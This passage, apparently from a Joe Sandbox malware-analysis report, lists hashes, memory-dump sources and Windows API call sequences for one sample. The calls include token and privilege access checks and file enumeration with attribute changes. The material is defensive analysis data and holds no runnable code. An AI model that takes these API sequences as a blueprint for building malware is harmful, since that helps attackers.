                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 8692825e9919de68594ad9101b10b57b1761991d3f4a09e1ce6eb6bf2d033d77
                                                                                                                        • Instruction ID: b4fcd2e97898c1d1e95cdfb52856e909c698e5e970dab9d8733a941e216dfe61
                                                                                                                        • Opcode Fuzzy Hash: 8692825e9919de68594ad9101b10b57b1761991d3f4a09e1ce6eb6bf2d033d77
                                                                                                                        • Instruction Fuzzy Hash: 620161B2D046149AF7258A24DC84BAAB779F7C4705F1481BBD60E623C1D77C1AC68A16
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 623bc1917886294fa3a3973daee9a4ce079e56149a84b3407f9cc2be0ab89ea1
                                                                                                                        • Instruction ID: 14454bd848f105198fd31c1056009a0a3624a6990289aef0bf5afecc7fb4dad4
                                                                                                                        • Opcode Fuzzy Hash: 623bc1917886294fa3a3973daee9a4ce079e56149a84b3407f9cc2be0ab89ea1
                                                                                                                        • Instruction Fuzzy Hash: 85F0C8F1D086186BE7244A24DC84BEBB775FB85705F1440FFD20E62681E7382AC5CE05
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: d8f5f7b99447ee2ae1927c43cf2d1809b16e407b5f11c99ce8941ce0b50a2731
                                                                                                                        • Instruction ID: 48cb507a7489ce748ca95b43230919b9bdd4d938de463dfe560f4786e58ad683
                                                                                                                        • Opcode Fuzzy Hash: d8f5f7b99447ee2ae1927c43cf2d1809b16e407b5f11c99ce8941ce0b50a2731
                                                                                                                        • Instruction Fuzzy Hash: 76D02BF2E0850412F3A40210EC55BA97A14D744B01F2A00BDD20F513C0CBBC22C08006
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 821cd59cc18272ed3796e4f433aba563b08464d2ee76fcfaa3ea73945a435167
                                                                                                                        • Instruction ID: 5119dceeff3587c28e3e0ce5d62307b050b56dee6c2e1fbfad8641ab02c6c180
                                                                                                                        • Opcode Fuzzy Hash: 821cd59cc18272ed3796e4f433aba563b08464d2ee76fcfaa3ea73945a435167
                                                                                                                        • Instruction Fuzzy Hash: B7D012F0C483159BEBE88B00DC457A97239EB40710F2041FAD50E66390DB341EC5CE57
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 167854a99600fa0e99dd71a3bcf69e92131ec6f4da5e2abf3ce424393fbf3d87
                                                                                                                        • Instruction ID: 49a8e1bd9c86ad356a55df1ae2979953c7749a54d733bd57f9585beca62ad5fb
                                                                                                                        • Opcode Fuzzy Hash: 167854a99600fa0e99dd71a3bcf69e92131ec6f4da5e2abf3ce424393fbf3d87
                                                                                                                        • Instruction Fuzzy Hash: BAD017B08083149BEBE88B00CC85BA9B339AB44710F2041EDA20E22690DB742EC4CF16
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: f8c83ce0659933d12c25224a73ff6f80cd7f86ca7789c9273cdc97401311b0bd
                                                                                                                        • Instruction ID: a6e3e7d99a38821e76979d747b758569e49a17766073ac88e5f09d68a5376ae8
                                                                                                                        • Opcode Fuzzy Hash: f8c83ce0659933d12c25224a73ff6f80cd7f86ca7789c9273cdc97401311b0bd
                                                                                                                        • Instruction Fuzzy Hash: 95D0C934E487688BCBE4DB00C8857E8B739EB95712F2082E6909E66260DF701EC6CF01
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                        • Instruction ID: 713af2a74f578950d3ef6b9bcb030b6e7d225ccb29fc3f0653117ab54aca20c7
                                                                                                                        • Opcode Fuzzy Hash: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                        • Instruction Fuzzy Hash: 38D0E974D083298BDBE89B00D8957D8B735AB44711F1440E9D54E66390DF701EC4CF06
                                                                                                                        APIs
                                                                                                                        • ImpersonateSelf.ADVAPI32(00000002,?,?), ref: 00413967
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00413974
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?), ref: 0041397B
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00413985
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 0041399C
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?), ref: 004139A3
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004139C8
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,?,?), ref: 004139DA
                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,?), ref: 004139F0
                                                                                                                        • GetLengthSid.ADVAPI32(?,?,?), ref: 00413A02
                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000010,?,?), ref: 00413A13
                                                                                                                        • InitializeAcl.ADVAPI32(00000000,-00000010,00000002,?,?), ref: 00413A2A
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?,?,?), ref: 00413A48
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,?), ref: 00413A60
                                                                                                                        • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A75
                                                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A82
                                                                                                                        • IsValidSecurityDescriptor.ADVAPI32(00000000,?,?), ref: 00413A89
                                                                                                                        • AccessCheck.ADVAPI32(00000000,?,00000001,?,?,00000014,?,?,?,?), ref: 00413AC8
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00413AD2
                                                                                                                        Strings
                                                                                                                        • AccessCheck() failed with error %lu, xrefs: 00413AD9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DescriptorSecurity$Initialize$AccessAllocCurrentErrorLastLocalOpenProcessThreadToken$AllocateAllowedCheckDaclGroupImpersonateLengthOwnerSelfValid
                                                                                                                        • String ID: AccessCheck() failed with error %lu
                                                                                                                        • API String ID: 1643233394-3122912231
                                                                                                                        • Opcode ID: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                        • Instruction ID: 6636ee4da2cd74bfd359609ec80115f8e5afcf80bc05880448599f8d891f14b3
                                                                                                                        • Opcode Fuzzy Hash: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                        • Instruction Fuzzy Hash: 4D515E75A00208ABEB10DFE5DC89FEFBBB8AF46741F044029F605A6280D7B949458B66
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00409FA9
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 0040A018
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040A02A
                                                                                                                          • Part of subcall function 00414A00: FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                          • Part of subcall function 00414A00: FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A047
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A056
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040A0C5
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirst$AttributesNext
